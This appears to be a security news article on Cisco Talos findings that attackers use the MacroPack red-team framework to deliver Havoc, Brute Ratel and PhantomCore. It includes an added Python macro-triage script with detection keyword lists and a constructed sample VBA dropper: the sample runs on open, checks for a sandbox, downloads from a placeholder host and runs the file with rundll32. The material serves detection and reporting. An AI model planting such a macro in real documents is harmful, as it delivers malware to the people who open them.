From Defense to Attack: MacroPack Defects to Hackers

A tool built for Red Team work has become a powerful instrument for stealthy attacks around the world.

Cisco Talos has discovered that the MacroPack red team framework is being actively used by threat actors to distribute the Havoc malware, Brute Ratel, and the PhantomCore RAT Trojan.

During the analysis of malicious document downloads on the VirusTotal platform, samples from different countries, including the United States, China, and Pakistan, were identified. The documents varied in sophistication, decoys, and infection methods, indicating the variety of cyber threats associated with the use of MacroPack.

Developed by a French developer, MacroPack is a specialized tool for Red Team simulations and exercises that emulate adversary actions. The software offers advanced features such as antivirus evasion, anti-reversing techniques, and the ability to create documents with obfuscated code. Such features hide malicious VB scripts from static analysis, which makes detection much more difficult.

The researchers noticed that hackers often use the paid version, MacroPack Pro, which adds specific VBA subroutines to documents. The subroutines, while not malicious in themselves, serve as an indicator that the document was created using the Pro version of the framework. Opening such a document triggers the first stage of the attack, in which the VBA code downloads a malicious DLL that communicates with the C2 server.

Analysis of the activity showed several significant clusters. In China, Pakistan, and the United States, various campaigns were recorded using documents created with MacroPack:
  • In China (May-July 2024), documents were circulated urging users to enable macros, which led to the download of Havoc and Brute Ratel malware that communicated with C2 servers in China.
  • In Pakistan, documents with military topics were found, which were distributed under the guise of official letters from the Pakistani Air Force. The files used Brute Ratel to transmit malicious data over DNS over HTTPS (DoH) and Amazon CloudFront.
  • In the United States (March 2023), the malicious document was presented as an encrypted form for updating the NMLS (Mortgage Company Licensing System) and used function names generated by a Markov chain to hide from antiviruses. The document contained code that checked for sandboxing before downloading unknown malware.
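The documents described above share a recognizable shape: an auto-executing macro, an environment check that aborts in a sandbox, and a download-and-run step for the next stage. The following Python script is an added example, not code from the original post or from Talos, showing how a defender can triage extracted VBA source for those traits. The sample macro inside it is constructed for the example (placeholder URL, no real payload) and is not MacroPack output; the keyword lists are an assumption about common indicators, not a MacroPack signature.

```python
"""Static triage heuristics for VBA macro source (example code).

Flags three traits seen in the campaigns discussed above: auto-execution
entry points, sandbox/environment probes, and download-and-execute
primitives, plus a crude measure of string obfuscation via Chr() calls.
"""
import re

# Constructed sample macro for this example: runs on open, bails out if the
# host looks like a fresh sandbox, then hands a downloaded file to a loader.
# The URL is a placeholder (.invalid TLD); nothing here is real tooling.
SAMPLE_VBA = r'''
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub AutoOpen()
    If Application.RecentFiles.Count < 3 Then Exit Sub
    Dim p As String
    p = Environ("TEMP") & "\" & Chr(117) & Chr(46) & "dll"
    URLDownloadToFile 0, "https://example.invalid/stage1", p, 0, 0
    Shell "rundll32.exe " & p & ",DllRegisterServer", vbHide
End Sub
'''

# Heuristic keyword lists (assumptions for this example, all lowercase).
AUTO_EXEC = ("autoopen", "auto_open", "document_open", "workbook_open")
DOWNLOAD_EXEC = ("urldownloadtofile", "msxml2.xmlhttp", "winhttprequest",
                 "wscript.shell", "shell ", "shell(", "rundll32", "regsvr32")
ENV_PROBES = ("recentfiles.count", "application.username",
              "numberofprocessors", "totalphysicalmemory", "win32_computersystem")


def _normalize(src: str) -> str:
    """Lowercase, strip blank lines, keep one statement per line."""
    return "\n".join(ln.strip().lower() for ln in src.splitlines() if ln.strip())


def find_indicators(src: str) -> dict:
    """Return the individual indicators found in a VBA source string."""
    text = _normalize(src)
    auto = sorted(name for name in AUTO_EXEC
                  if re.search(r"\bsub\s+" + name + r"\b", text))
    download = sorted(kw for kw in DOWNLOAD_EXEC if kw in text)
    probes = sorted(kw for kw in ENV_PROBES if kw in text)
    # Chr()/ChrW() calls used to assemble strings piecewise are a common
    # obfuscation tell; count them rather than try to decode them.
    chr_calls = len(re.findall(r"\bchr\w*\s*\(", text))
    return {"auto_exec": auto, "download_exec": download,
            "env_probes": probes, "chr_calls": chr_calls}


def triage(src: str, threshold: int = 4) -> dict:
    """Score the indicators and return a verdict plus the evidence."""
    ind = find_indicators(src)
    score = 0
    score += 2 if ind["auto_exec"] else 0        # runs without user action
    score += len(ind["download_exec"])           # each fetch/exec primitive
    score += len(ind["env_probes"])              # each sandbox/env check
    score += 1 if ind["chr_calls"] >= 2 else 0   # piecewise string building
    verdict = "suspicious" if score >= threshold else "benign"
    return {"score": score, "verdict": verdict, "indicators": ind}


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    print(result["verdict"], result["score"])
    for key, value in result["indicators"].items():
        print(f"  {key}: {value}")
```

The script takes already-extracted macro text; in practice you would feed it the output of a VBA extractor run over the document. The score is deliberately simple so that each point can be traced back to a visible line, which is what an analyst needs when deciding whether a flagged document deserves a closer look.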

Brute Ratel has become a popular alternative to Cobalt Strike among hackers since 2022. The tool is actively used to bypass EDR systems and antiviruses. In addition, some ransomware groups are using a cracked version of the tool to carry out stealthy attacks.
